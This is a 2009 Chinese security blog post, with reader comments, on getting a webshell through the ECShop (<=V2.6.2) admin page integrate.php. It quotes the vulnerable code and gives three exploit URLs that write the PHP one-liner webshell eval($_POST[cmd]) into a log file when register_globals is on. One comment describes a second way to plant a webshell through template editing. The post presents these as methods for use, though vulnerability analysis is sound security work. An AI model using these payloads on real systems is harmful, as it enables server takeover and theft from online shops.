Apr
7

ECShop网店系统<=V2.6.2 后台拿webshell

ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。(官方介绍)

ECSHOP前段时间出了个注射漏洞:http://bbs.wolvez.org/topic/67/,拿后台权限应该没有问题,但文章没有提及如何在后台拿shell。昨天可乐在t00ls.Net上发帖问如何拿shell,无聊中我baidu、google了下,网上貌似没有拿shell的办法。好久没读代码了,无聊中下了ECSHOP最新版(V2.6.2)的源码过来读,很庆幸,给我找到一个可以直接写shell的文件。与注射一样,同样是个变化未初始化导致的问题,于是,同样只能用在register_globals为on的环境下。

integrate.php第740行起:

if ($_REQUEST['act'] == 'sync')
{
    $size = 100;
    
    ......

    $tasks = array();
    if ($task_del > 0)
    {
        $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id="task_del">' . $_LANG['task_uncomplete'] . '<span>');
        $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";
        $del_list = $db->getCol($sql);//$del_list未初始化,转载请注明来自:www.oldjun.com
    }

    if ($task_rename > 0)
    {
        $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id="task_rename">' . $_LANG['task_uncomplete'] . '</span>');
        $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";
        $rename_list = $db->getAll($sql);//$rename_list未初始化,转载请注明来自:www.oldjun.com
    }

    if ($task_ignore >0)
    {
        $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";
        $ignore_list = $db->getCol($sql);//$ignore_list未初始化,转载请注明来自:www.oldjun.com
    }

   ......

    /* 保存修改日志 */
    $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');
    $log = '';
    if (isset($del_list))
    {
        $log .= '$del_list=' . var_export($del_list,true) . ';';
    }
    if (isset($rename_list))
    {
        $log .= '$rename_list=' . var_export($rename_list, true) . ';';
    }
    if (isset($ignore_list))
    {
        $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
    }
    //未做过滤,直接写log,转载请注明来自:www.oldjun.com
    fwrite($fp, $log);
    fclose($fp);

    $smarty->assign('tasks', $tasks);
    $smarty->assign('ur_here',$_LANG['user_sync']);
    $smarty->assign('size', $size);
    $smarty->display('integrates_sync.htm');
}

$del_list、$rename_list、$ignore_list均没有初始化,于是,均可以直接写shell。

利用方法:

http://www.oldjun.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
http://www.oldjun.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
http://www.oldjun.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>

三个链接,随便输入一个就可以了,生成http://www.oldjun.com/data/integrate__log.php,就是一句话小马了~

共有18条评论

  1. 可酷可乐: Apr,7th,2009

    膜拜oldjun大牛!

  2. 可酷可乐: Apr,7th,2009

    补充下.CSS好像有问题.1280*1024 IE6错位.

  3. oldjun: Apr,7th,2009

    IE6下一直存在这个问题,但IE的其他版本与其他浏览器都显示正常,于是我也懒得捣腾CSS了,反正IE6最终会被淘汰:)~~~

  4. ECShop网店系统: Apr,7th,2009

    [...]作者:oldjun[...]

  5. schyman: Apr,7th,2009

    chrome也会错位。

  6. [...][...]

  7. 肉丝: Apr,8th,2009

    一般是我是在“模板管理”-》“库项目管理”,然后选择myship.lbi,在模板里面随便插入一句话小马,再连接http://www.target.com/myship.php文件就可以
    ECshop的smarty模板机制是允许直接执行php代码的

  8. 王朝阳: Apr,8th,2009

    学习了~~~~~~~~~~~

  9. oldjun: Apr,8th,2009

    to schyman:chrome没试过,IE7、FIREFOX、SAFARI下都没问题的,有空看看;to 肉丝:学习到了,多谢共享,等下试试。

  10. oldjun: Apr,9th,2009

    to 肉丝,学到了,确实可以~~~“smarty模板机制是允许直接执行php代码”,很赞!

  11. Monster: Apr,9th,2009

    太上老君,刚才又在sebug上看见你了,嘿嘿

  12. xhming: Apr,9th,2009

    模板运行机制用到了eval()从这里可以看到ecshop对他的程序蛮有信心,后台放松了很多,程序一有弱点的话就完了,呵呵~

  13. ellisonyang: Apr,21st,2009

    oldjun交换连接吗?
    已经给你弄好了
    http://ellisonyang.blogspot.com/

  14. 生存之民工: May,11th,2009

    php看得我头疼 小菜来学习了

  15. cyberh4ck: May,12th,2009

    我在 本地 搭建 ecshop 平台 怎么没有成功?
    环境如下:
    ecshop 2.5.0
    apache 2.0.63
    php 5.2.5
    winXP
    怎么没有 在 data 目录下生成你说的 data/integrate__log.php

  16. oldjun: May,12th,2009

    ecshop 2.5.0 ...没测试过,2.6.0与2.6.2均可以!

  17. dingo: May,14th,2009

    火狐也冒到外面去了

  18. l4yn3: Jun,5th,2009

    register_globals为on的环境貌似现在不好找了

NAME:

required

E-MAIL:

required, will not be published

HOMEPAGE:

CONTENT: